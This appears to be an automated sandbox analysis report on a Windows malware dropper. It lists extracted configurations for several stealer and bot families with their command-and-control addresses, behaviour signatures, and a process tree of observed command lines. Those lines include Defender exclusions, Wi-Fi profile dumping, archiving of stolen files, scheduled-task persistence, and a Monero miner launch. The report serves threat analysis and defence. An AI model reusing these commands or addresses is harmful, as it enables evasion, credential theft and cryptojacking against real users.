Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-05-2024 20:24

General

  • Target

    0ed474222bdc43be21ee97c2297cf342c7f6e04a214bb62c0efb299bc1bd3716.exe

  • Size

    1.7MB

  • MD5

    c1234404e4bbfca0b930e63023d719a4

  • SHA1

    3074b6afcb132d0a816ff1f1c4ebf30dd54211fc

  • SHA256

    0ed474222bdc43be21ee97c2297cf342c7f6e04a214bb62c0efb299bc1bd3716

  • SHA512

    e4b4b2ad220be6cfda08faf747094bb0bd1dd9e181cf35cf6fc64c4a7ec6e0855235d8253d5c37fa7bb49db59c13d82399ba1a1b13089a21d366e3ca4e68b456

  • SSDEEP

    24576:hRN+xIQmUxkVzz+N5mvpf4rgt0TtdElQ53pji0fmCxkb/ZVjjTx/aKXQXUFObMGb:hv+tZlIGeQmetpdZaVjHp5FJGrjTH

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://193.233.132.139

Attributes
  • install_dir

    5454e6f062

  • install_file

    explorta.exe

  • strings_key

    c7a869c5ba1d72480093ec207994e2bf

  • url_paths

    /sev56rkm/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

systembc

C2

67.211.218.147:4001

Extracted

Family

lumma

C2

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 47 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 43 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of FindShellTrayWindow 44 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0ed474222bdc43be21ee97c2297cf342c7f6e04a214bb62c0efb299bc1bd3716.exe
    "C:\Users\Admin\AppData\Local\Temp\0ed474222bdc43be21ee97c2297cf342c7f6e04a214bb62c0efb299bc1bd3716.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
      "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:5088
      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
        "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
        3⤵
          PID:1580
        • C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
          "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:956
          • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
            "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:1620
            • C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4704
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:4532
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 880
                  6⤵
                  • Program crash
                  PID:2200
              • C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
                "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2696
              • C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
                "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1252
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  6⤵
                    PID:3700
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • Loads dropped DLL
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5152
                • C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
                  5⤵
                  • UAC bypass
                  • Windows security bypass
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Windows security modification
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  • System policy modification
                  PID:5540
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5740
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                    6⤵
                      PID:5772
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                      6⤵
                        PID:5924
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                        6⤵
                          PID:5952
                      • C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:6092
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:6120
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                          5⤵
                          • Loads dropped DLL
                          PID:5440
                          • C:\Windows\system32\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                            6⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5484
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profiles
                              7⤵
                                PID:5496
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5648
                          • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3944
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:6036
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                6⤵
                                • Checks computer location settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6052
                                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2416
                                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5300
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                  7⤵
                                    PID:1708
                                    • C:\Windows\SysWOW64\choice.exe
                                      choice /C Y /N /D Y /T 3
                                      8⤵
                                        PID:6028
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 352
                                    6⤵
                                    • Program crash
                                    PID:6092
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                  5⤵
                                  • Blocklisted process makes network request
                                  • Loads dropped DLL
                                  PID:2852
                                • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
                                  5⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:2168
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                    6⤵
                                      PID:5428
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc stop GameServerClient
                                        7⤵
                                        • Launches sc.exe
                                        PID:5456
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameServerClient confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5620
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc delete GameSyncLink
                                        7⤵
                                        • Launches sc.exe
                                        PID:5548
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameSyncLink confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5476
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:6132
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService start GameSyncLink
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5148
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                      6⤵
                                        PID:5544
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc stop GameServerClientC
                                          7⤵
                                          • Launches sc.exe
                                          PID:6116
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove GameServerClientC confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5196
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc delete PiercingNetLink
                                          7⤵
                                          • Launches sc.exe
                                          PID:6036
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove PiercingNetLink confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:6104
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2720
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService start PiercingNetLink
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5004
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                        6⤵
                                          PID:1960
                                          • C:\Windows\SysWOW64\sc.exe
                                            Sc delete GameSyncLinks
                                            7⤵
                                            • Launches sc.exe
                                            PID:3724
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService remove GameSyncLinks confirm
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4852
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3456
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService start GameSyncLinks
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4604
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                          6⤵
                                            PID:1416
                                        • C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
                                          5⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:5600
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
                                            6⤵
                                            • Creates scheduled task(s)
                                            PID:4888
                                        • C:\Users\Admin\AppData\Local\Temp\1000105001\jgyesfersg.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000105001\jgyesfersg.exe"
                                          5⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:4336
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                            6⤵
                                              PID:5712
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
                                                work.exe -priverdD
                                                7⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                PID:5672
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\ogkdraw.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ogkdraw.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Drops file in Windows directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3632
                                      • C:\Users\Admin\AppData\Local\Temp\1000020001\17deada4c3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000020001\17deada4c3.exe"
                                        3⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:3416
                                      • C:\Users\Admin\1000021002\2ac2fb2f35.exe
                                        "C:\Users\Admin\1000021002\2ac2fb2f35.exe"
                                        3⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        • Suspicious use of WriteProcessMemory
                                        PID:1952
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                          4⤵
                                          • Enumerates system info in registry
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          • Suspicious use of WriteProcessMemory
                                          PID:2044
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe7b4cab58,0x7ffe7b4cab68,0x7ffe7b4cab78
                                            5⤵
                                              PID:5052
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:2
                                              5⤵
                                                PID:3696
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:8
                                                5⤵
                                                  PID:4416
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2256 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:8
                                                  5⤵
                                                    PID:1012
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3092 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:1
                                                    5⤵
                                                      PID:2432
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:1
                                                      5⤵
                                                        PID:3700
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4388 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:1
                                                        5⤵
                                                          PID:4880
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:8
                                                          5⤵
                                                            PID:5264
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:8
                                                            5⤵
                                                              PID:5324
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3340 --field-trial-handle=1928,i,1139749330495646720,5518963064765575936,131072 /prefetch:8
                                                              5⤵
                                                                PID:5332
                                                      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                        C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        PID:1700
                                                      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                        C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:556
                                                      • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                        1⤵
                                                          PID:4140
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4704 -ip 4704
                                                          1⤵
                                                            PID:3528
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3944 -ip 3944
                                                            1⤵
                                                              PID:6080
                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                              "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:5376
                                                              • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5840
                                                                • C:\Windows\Temp\947517.exe
                                                                  "C:\Windows\Temp\947517.exe" --list-devices
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:5692
                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                              "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:5160
                                                              • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5408
                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                              "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:2012
                                                              • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                PID:3564
                                                                • C:\Windows\Temp\237439.exe
                                                                  "C:\Windows\Temp\237439.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5456
                                                            • C:\ProgramData\jrai\jbqfixm.exe
                                                              C:\ProgramData\jrai\jbqfixm.exe start2
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4976
                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                              1⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5380
                                                            • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                              C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                              1⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Checks whether UAC is enabled
                                                              PID:3088
